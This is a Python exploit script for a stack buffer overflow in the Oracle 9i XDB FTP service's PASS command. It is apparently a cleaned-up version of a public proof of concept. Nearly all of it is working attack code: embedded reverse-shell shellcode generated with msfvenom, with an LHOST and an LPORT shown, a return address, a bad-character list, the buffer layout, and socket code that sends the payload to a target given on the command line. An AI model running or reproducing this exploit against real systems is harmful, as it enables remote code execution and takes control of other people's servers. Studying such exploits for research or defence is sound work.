#!/usr/bin/python
## oracle_9i_xdb_ftp.py
##
## Name: Oracle 9i XDB FTP PASS Overflow (win32)
## Description: By passing an overly long string to the PASS command, a
## stack-based buffer overflow occurs. David Litchfield illustrated
## multiple vulnerabilities in the Oracle 9i XML Database (XDB) during
## a seminar on "Variations in exploit methods between Linux and Windows"
## presented at the Black Hat conference.
##
## Author: charles.holtzkampf [at] gmail.com
## WWW:www.bommachine.co.uk
## Usage: python oracle_9i_xdb_ftp.py <IP Address> <Port>
import sys, socket
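## --- Target-specific constants -----------------------------------------------
## Everything that goes on the wire is kept as bytes.  The original built the
## buffer as a str and called .encode('utf-8') on it: every byte >= 0x80 (the
## jmp opcode, the return address, most of the shellcode) became a two-byte
## UTF-8 sequence, so the payload that reached the server was not the one
## assembled here.  Byte literals are sent verbatim.
ret = b"\x46\x6d\x61\x60"  ## oraclient9.dll (pop/pop/ret) -- build-specific, re-verify against the target's DLL
prepend = b"\x81\xc4\xff\xef\xff\xff\x44"  ## add esp,0xffffefff ; inc esp -- runs after the NOP sled, before the decoder
                                           ## (presumably moves esp clear of the payload so the decoder's stack use
                                           ## does not overwrite it -- confirm in a debugger if the target differs)
## Max space for shell code = 800
MAX_SHELLCODE = 800
## Bad characters according to metasploit (the -b list below must match this set):
BAD_CHARS = frozenset(b"\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40")
## Generate payload (replace LHOST/LPORT with your listener; keep the b"" prefix on the emitted lines):
## msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=4443 EXITFUNC=thread -a x86 --platform Windows -b \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 -f python -v shellcode
## Payloads size = 348
shellcode = b""
shellcode += b"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
shellcode += b"\x81\x76\x0e\x94\x8c\x91\xbd\x83\xee\xfc\xe2\xf4"
shellcode += b"\x68\x64\x13\xbd\x94\x8c\xf1\x34\x71\xbd\x51\xd9"
shellcode += b"\x1f\xdc\xa1\x36\xc6\x80\x1a\xef\x80\x07\xe3\x95"
shellcode += b"\x9b\x3b\xdb\x9b\xa5\x73\x3d\x81\xf5\xf0\x93\x91"
shellcode += b"\xb4\x4d\x5e\xb0\x95\x4b\x73\x4f\xc6\xdb\x1a\xef"
shellcode += b"\x84\x07\xdb\x81\x1f\xc0\x80\xc5\x77\xc4\x90\x6c"
shellcode += b"\xc5\x07\xc8\x9d\x95\x5f\x1a\xf4\x8c\x6f\xab\xf4"
shellcode += b"\x1f\xb8\x1a\xbc\x42\xbd\x6e\x11\x55\x43\x9c\xbc"
shellcode += b"\x53\xb4\x71\xc8\x62\x8f\xec\x45\xaf\xf1\xb5\xc8"
shellcode += b"\x70\xd4\x1a\xe5\xb0\x8d\x42\xdb\x1f\x80\xda\x36"
shellcode += b"\xcc\x90\x90\x6e\x1f\x88\x1a\xbc\x44\x05\xd5\x99"
shellcode += b"\xb0\xd7\xca\xdc\xcd\xd6\xc0\x42\x74\xd3\xce\xe7"
shellcode += b"\x1f\x9e\x7a\x30\xc9\xe4\xa2\x8f\x94\x8c\xf9\xca"
shellcode += b"\xe7\xbe\xce\xe9\xfc\xc0\xe6\x9b\x93\x73\x44\x05"
shellcode += b"\x04\x8d\x91\xbd\xbd\x48\xc5\xed\xfc\xa5\x11\xd6"
shellcode += b"\x94\x73\x44\xed\xc4\xdc\xc1\xfd\xc4\xcc\xc1\xd5"
shellcode += b"\x7e\x83\x4e\x5d\x6b\x59\x06\xd7\x91\xe4\x9b\xb6"
shellcode += b"\x94\xa3\xf9\xbf\x94\x9d\xca\x34\x72\xe6\x81\xeb"
shellcode += b"\xc3\xe4\x08\x18\xe0\xed\x6e\x68\x11\x4c\xe5\xb1"
shellcode += b"\x6b\xc2\x99\xc8\x78\xe4\x61\x08\x36\xda\x6e\x68"
shellcode += b"\xfc\xef\xfc\xd9\x94\x05\x72\xea\xc3\xdb\xa0\x4b"
shellcode += b"\xfe\x9e\xc8\xeb\x76\x71\xf7\x7a\xd0\xa8\xad\xbc"
shellcode += b"\x95\x01\xd5\x99\x84\x4a\x91\xf9\xc0\xdc\xc7\xeb"
shellcode += b"\xc2\xca\xc7\xf3\xc2\xda\xc2\xeb\xfc\xf5\x5d\x82"
shellcode += b"\x12\x73\x44\x34\x74\xc2\xc7\xfb\x6b\xbc\xf9\xb5"
shellcode += b"\x13\x91\xf1\x42\x41\x37\x71\xa0\xbe\x86\xf9\x1b"
shellcode += b"\x01\x31\x0c\x42\x41\xb0\x97\xc1\x9e\x0c\x6a\x5d"
shellcode += b"\xe1\x89\x2a\xfa\x87\xfe\xfe\xd7\x94\xdf\x6e\x68"

PASSWD_PAD = 442      ## filler bytes before the overwritten control data
SOCKET_TIMEOUT = 10.0  ## seconds; the original blocked forever on a silent server


def find_bad_chars(buf: bytes) -> set:
    """Return the set of BAD_CHARS byte values present in *buf* (empty when clean)."""
    return set(buf) & BAD_CHARS


def build_exploit(payload=None) -> bytes:
    """Assemble the PASS argument that triggers the overflow.

    Layout (matches the original script): 442 bytes of filler, ``jmp short +6``
    plus two NOPs, the pop/pop/ret address, a NOP sled padding the shellcode
    region to MAX_SHELLCODE bytes, the ``prepend`` stack adjustment, then the
    shellcode.  The pop/pop/ret gadget and the 4-byte jmp/NOP slot directly in
    front of it look like an SEH overwrite (next-SEH = jmp, handler = gadget),
    but the script does not state that -- confirm against the target.

    Args:
        payload: alternative shellcode bytes; defaults to the module-level
            ``shellcode``.

    Returns:
        The exploit buffer as bytes, without the ``PASS `` prefix or CRLF.

    Raises:
        ValueError: if the payload exceeds MAX_SHELLCODE bytes or the assembled
            buffer contains any byte in BAD_CHARS (the server would truncate
            or mangle the command).
    """
    payload = shellcode if payload is None else bytes(payload)
    if len(payload) > MAX_SHELLCODE:
        raise ValueError(f"shellcode is {len(payload)} bytes; only {MAX_SHELLCODE} fit")
    passwd = b"B" * PASSWD_PAD
    jmp_short = b"\xEB\x06"  ## jmp short +6: skips the two NOPs and the 4-byte ret, landing on the sled
    two_nops = b"\x90\x90"
    nops = b"\x90" * (MAX_SHELLCODE - len(payload))  ## pad the shellcode region to MAX_SHELLCODE bytes
    buf = passwd + jmp_short + two_nops + ret + nops + prepend + payload
    bad = find_bad_chars(buf)
    if bad:
        raise ValueError("buffer contains bad characters: "
                         + ", ".join(f"0x{b:02x}" for b in sorted(bad)))
    return buf


def main(argv=None) -> int:
    """Connect to the XDB FTP service and send USER then the overflowing PASS.

    Args:
        argv: ``[host, port]``; defaults to ``sys.argv[1:]``.

    Returns:
        Process exit status: 0 on send, 1 on a network or payload error,
        2 on bad arguments.
    """
    args = sys.argv[1:] if argv is None else list(argv)
    if len(args) != 2:
        print("Usage: python oracle_9i_xdb_ftp.py <IP Address> <Port>")
        return 2
    rhost = args[0]
    try:
        rport = int(args[1])
    except ValueError:
        print("Port must be an integer, got " + repr(args[1]))
        return 2
    try:
        exploit = build_exploit()
    except ValueError as exc:
        print("Refusing to send: " + str(exc))
        return 1
    user = b"A" * 10  ## arbitrary user name; only the PASS handling is attacked
    try:
        print("\nConnecting...")
        ## 'with' closes the socket on every path; the original's bare 's.close'
        ## never called close() at all.
        with socket.create_connection((rhost, rport), timeout=SOCKET_TIMEOUT) as s:
            s.recv(1024)  ## banner
            ## space after USER added: the original sent 'USERAAAAAAAAAA', an
            ## unknown command; PASS is what carries the overflow either way.
            s.sendall(b"USER " + user + b"\r\n")
            s.recv(1024)
            s.sendall(b"PASS " + exploit + b"\r\n")
        print("\nDone!")
    except OSError as exc:
        ## Narrowed from a bare except so a bug in this script is not reported
        ## as a connection failure.
        print("Could not connect to " + rhost + ":" + str(rport) + "! (" + str(exc) + ")")
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main())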